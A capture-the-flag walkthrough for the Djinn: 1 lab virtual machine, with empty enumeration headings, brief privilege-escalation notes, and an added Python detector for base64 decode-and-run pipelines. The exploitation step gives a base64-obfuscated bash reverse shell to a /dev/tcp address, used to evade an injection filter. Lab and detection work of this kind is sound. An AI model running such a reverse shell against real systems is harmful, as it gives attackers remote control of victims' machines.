DJINN: 1 — Walkthrough

Level: Beginner-Intermediate

  • flags: user.txt and root.txt
  • Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which are present in user.txt and root.txt respectively.
  • Format: Virtual Machine (Virtualbox — OVA)
  • Operating System: Linux

Enumeration

More Enumeration


Exploitation

Let’s execute the following command, which is base64-encoded to bypass the filtering on the injection:

echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTkyLjE2OC4xMDMuMTM0LzQyNDIgMDwmMSAyPiYx | base64 -d | bash
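
From the defender's side, the command above is a decode-and-run pipeline. The following added example (not part of the original walkthrough) flags such pipelines in recorded command lines and decodes the payload for triage; the function names, indicator names and every sample line other than the page's own command are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Matches `echo <base64> | base64 -d | sh/bash`, the shape of the command above.
PIPELINE = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/]{16,}={0,2})['\"]?\s*\|\s*"
    r"base64\s+(?:-d|--decode)\s*\|\s*(?:/bin/)?(?:ba|da|z)?sh\b"
)
# Indicator names are hypothetical labels chosen for this example.
SUSPICIOUS = {
    "dev_tcp_redirect": re.compile(r"/dev/(?:tcp|udp)/([\w.\-]+)/(\d+)"),
    "login_or_interactive_shell": re.compile(r"\b(?:ba)?sh\s+-[il]\b"),
}

def inspect_command(cmdline):
    """Return None when no decode-and-run pipeline is present, else a finding."""
    m = PIPELINE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except (binascii.Error, ValueError):
        return {"decoded": None, "indicators": ["undecodable_base64"], "peer": None}
    decoded = raw.decode("utf-8", "replace")
    hits = [name for name, rx in SUSPICIOUS.items() if rx.search(decoded)]
    peer = SUSPICIOUS["dev_tcp_redirect"].search(decoded)
    return {"decoded": decoded, "indicators": hits,
            "peer": f"{peer.group(1)}:{peer.group(2)}" if peer else None}

def scan(lines):
    """Yield (line_number, finding) for every line carrying the pipeline."""
    for n, line in enumerate(lines, 1):
        finding = inspect_command(line)
        if finding is not None:
            yield n, finding

# First entry is the command from this walkthrough; the rest are constructed.
SAMPLE_LINES = [
    "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTkyLjE2OC4xMDMuMTM0LzQyNDIgMDwmMSAyPiYx | base64 -d | bash",
    "echo aGVsbG8gd29ybGQ= | base64 -d",               # decoded but never executed
    "echo ZWNobyBoZWxsbyB3b3JsZA== | base64 -d | sh",  # executed, no network indicator
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LINES):
        print(n, f["indicators"], f["peer"], repr(f["decoded"]))
```
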


Privilege Escalation

Now we are nitish.

We have a SUID file named genie.

  • Looked through the strings output of genie.
  • We can see that there is another parameter, -cmd.

The same goes for /lago.